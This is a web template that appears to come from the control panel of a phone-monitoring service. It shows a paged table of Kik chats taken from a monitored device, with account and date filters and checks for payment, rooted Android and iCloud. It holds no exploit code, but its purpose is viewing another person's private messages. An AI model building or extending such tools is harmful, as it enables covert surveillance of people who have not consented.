<style type="text/css">
    @media (max-width: 767px) {
        .daterangepickerWrapper {
            margin-top: 10px;
        }
    }

    .nav.nav-pills {
        margin-top: 10px;
    }
</style>
<div>
    <h1 class="text-center">{$title}</h1>

    {insert "inc.cp.messages.htm"}

    {if !$paid}
        {insert "cp/updatePackage.html"}
    {elseif $di.currentDevice.os=='android' && !$di.currentDevice.rooted}
        {include "content/{$di.t->getLocale()}/rootPhone.html"}
    {elseif count($accounts)}
        {if $di.currentDevice.os=='android' && $di.currentDevice.rooted && !$di.currentDevice.rootAccess}
            {include "content/{$di.t->getLocale()}/rootAccessPhone.html"}
        {/if}
    <div class="row form-inline">
        <div class="col-lg-6 col-md-6 col-sm-6">
            <label for="account">{$di.t->_('Account')} </label>
            {include "scripts/select.htm" name="account" id="account" class="form-control" options=$accounts}
        </div>
        <div class="col-lg-6 col-md-6 col-sm-6">
            <div class="daterangepickerWrapper">
                <div id="reportrange" class="btn btn-default pull-right">
                    <i class="fa fa-calendar fa-lg"></i>
                    <span></span>
                    <b class="caret"></b>
                </div>
            </div>
        </div>
    </div>

    <div class="table-container dialogs-table">
        <table class="dataTable" id="private-datatable" aria-describedby="datatables_info">
            <thead>
                <tr role="row">
                    <th>{$di.t->_('Name')}</th>
                    <th>{$di.t->_('Last Message')}</th>
                    <th>{$di.t->_('Date')}</th>
                </tr>
            </thead>
        </table>
    </div>
    <script type="text/javascript">
        
        function customOffsetMoment(input, format, locale, strict) {
            var m = moment(input, format, locale, strict);
            {if isset($customTimezoneOffset)}
            m.zone({$customTimezoneOffset});
            {/if}
            return m;
        }
        
        $(document).ready(function() {
            var kik = {
                startDate: -1,
                endDate: -1,
                table: null,
                getRangeUrl: function(start, end) {
                    if (start === null && end === null) {
                        this.startDate = this.endDate = -1;
                    } else if (start && end) {
                        this.startDate = moment(start).unix();
                        this.endDate = moment(end).unix();
                    }

                    var url = '{$di.config.domain}/cp/kik?';

                    return url + $.param({
                        account: $('#account').val(),
                        timeFrom: this.startDate,
                        timeTo: this.endDate
                    });
                },
                initTable: function() {
                    var table = $('#private-datatable').dataTable({
                        bProcessing: true,
                        bServerSide: true,
                        sAjaxSource: this.getRangeUrl(),
                        bPaginate: true,
                        bFilter: false,
                        bSort: true,
                        bInfo: true,
                        bAutoWidth: false,
                        bSortMulti: false,
                        iDisplayLength: {$authData.records_per_page},
                        aaSorting: [[2, 'desc']],
                        oLanguage: {
                            sUrl: '{$di.config.staticDomain}/datatables/language/{$di.t->getLocale()}.txt'
                        },
                        aoColumns: [{
                                mData: "name",
                                bUseRendered: false,
                                fnRender: function(obj) {
                                    if (obj.aData.is_group > 0) {
                                        return '<b>Group</b>';
                                    } else {
                                        return escapeAndTruncate(obj.aData.name);
                                    }
                                },
                                'sClass': 'username'
                            },
                            {
                                mData: "text",
                                fnRender: function(obj, value) {
                                    return escapeAndTruncate(value);
                                }
                            },
                            {
                                mData: null,
                                sWidth: '180px',
                                fnRender: function(obj, value) {
                                    return customOffsetMoment(obj.aData.timestamp * 1000).format('lll');
                                }
                            }],
                        fnRowCallback: function(nRow, data) {
                            $(nRow).on('click', function() {
                                if (data.is_group > 0) {
                                    window.location = '{$di.router->getRouteUrl("kik")}/' + encodeURIComponent($('#account').val()) + '/group/' + encodeURIComponent(data.group_id);
                                } else {
                                    window.location = '{$di.router->getRouteUrl("kik")}/' + encodeURIComponent($('#account').val()) + '/private/' + encodeURIComponent(data.group_id);
                                }
                            });
                        },
                        fnDrawCallback: function() {
                            kik.table = table;
                            $(this).find('tbody').tableScroll();
                        }
                    });
                },
                reloadTable: function(url) {
                    this.table.fnReloadAjax(url);
                }
            };

            kik.initTable();

            $('#account').change(function() {
                kik.reloadTable(kik.getRangeUrl());
            });

            $('#reportrange').timeRange(function(from, to) {
                kik.reloadTable(kik.getRangeUrl(from, to));
            });
        });
    </script>
    {else}
        {if $di.currentDevice.os=='android' && !$di.currentDevice.rooted}
            {include "content/{$di.t->getLocale()}/rootPhone.html"}
        {elseif $di.currentDevice.os=='android' && $di.currentDevice.rooted && !$di.currentDevice.rootAccess}
            {include "content/{$di.t->getLocale()}/rootAccessPhone.html"}    
        {else}
            {include "content/{$di.t->getLocale()}/noDataTitle.html"
                moduleName = $di.t->_('Kik')
            }

            {if $di.currentDevice.os=='icloud'}
                {include "content/{$di.t->getLocale()}/noDataICloud.html"
                isModule = true
                moduleId = 'kik'
                moduleName = $di.t->_('Kik')
                }
            {else}
                {include "content/{$di.t->getLocale()}/noData.html"
                    applicationId = 'kik'
                    applicationName = $di.t->_('Kik')
                }
            {/if}
        {/if}
    {/if}
</div>
